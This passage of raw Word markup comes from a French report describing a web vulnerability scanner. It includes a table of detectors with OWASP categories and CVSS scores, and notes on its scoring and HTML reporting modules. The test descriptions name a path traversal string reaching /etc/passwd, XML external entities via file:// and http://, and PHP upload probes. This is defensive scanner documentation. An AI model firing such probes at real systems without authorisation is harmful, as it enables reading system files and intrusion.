                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>PathTraversalDetector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2537C25A" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>A01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6727B63C" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Actif</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7986F6D5" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>../etc/passwd + encodages alternatifs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="49B83DD1" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>7.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="5D1BF549" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="73DB22C4" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>XXEDetector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="38D1B775" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>A05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="6077DFE4" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Actif</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="71D5063E" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t>Entités XML externes file:// et http://</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="145D5F41" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>8.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="4F2270D5" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="149DE5F6" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>FileUploadDetector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="088BCC30" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>A04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7624FB4A" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Actif</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="03C94C62" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Upload .php + vérification d'accessibilité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C8400E0" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>8.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="73F37C33" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="774F84F3" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>AuthFailuresDetector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="40AC5BDC" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>A07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="2F4CCAE2" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Actif</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="30101047" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t>Credentials par défaut + formulaire login</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="734D34E7" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>9.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="31A87871" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5EF09B26" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CryptographicFailuresDetector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F7CECED" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>A02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="069A1E10" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Passif</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="617FF6BF" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Formulaires password en HTTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0529DA4D" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>7.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="1C4C6D2A" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="272150EF" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>SecurityMisconfigDetector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="442A980C" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>A05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="3117D92E" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Passif</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="7AF384DC" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t>Headers HTTP manquants, fichiers exposés</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="6B3CF33D" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>5.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="3C2E5B04" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B049D6E" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>VulnerableComponentsDetector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B184F24" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>A06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2EA0EB2D" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Passif</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E6AE1AE" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Bannières version serveur/framework</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1560C33B" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>5.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="0A7FD9CB" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="59668537" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>IntegrityDetector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="4D1163E0" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>A08</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="2F315A7F" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Passif</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="136996FA" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t>Attribut SRI manquant sur ressources externes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="54D1AA51" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>4.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="65D2F797" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="006A6D93"/>
    <w:p w14:paraId="69715A8F" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="505050"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>2.5.4  Module CVSSEvaluator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CABFFB5" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Le CVSSEvaluator enrichit chaque objet Vulnerability avec un score CVSS v3.1, un vecteur CVSS officiel (ex: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H), un niveau de sévérité (Critique/Élevé/Moyen/Faible) et une recommandation de remédiation. Les profils CVSS sont définis statiquement dans un dictionnaire CVSS_PROFILES, garantissant la cohérence et la reproductibilité des scores.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7DA1D7" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="505050"/>
          <w:sz w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>2.5.5  Module HTMLReporter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B67BD6" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Le HTMLReporter génère un fichier HTML5 autonome (CSS intégré via balises &lt;style&gt;, aucune dépendance CDN externe) contenant : un en-tête avec les métadonnées du scan (cible, date, durée, </w:t>
        <w:lastRenderedPageBreak/>
        <w:t>pages crawlées), un tableau de bord avec des cartes de comptage par sévérité, et une liste dépliable (&lt;details&gt;/&lt;summary&gt;) de chaque vulnérabilité avec URL, méthode, paramètre, payload, preuve, vecteur CVSS et recommandation. Le rapport est triable par sévérité et directement exploitable sans installation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB9AC90"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2.6  Technologies et Stack Technique</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741DF8C2" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="40"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="505050"/>
          <w:sz w:val="18"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Tableau — Stack technologique complète du projet</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2264"/>
        <w:gridCol w:w="2265"/>
        <w:gridCol w:w="1133"/>
        <w:gridCol w:w="3676"/>
      </w:tblGrid>
      <w:tr w:rsidR="006A6D93" w14:paraId="0BB5A613" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="003366"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3CDD329F" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Composant</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="003366"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0CEBD941" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Technologie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
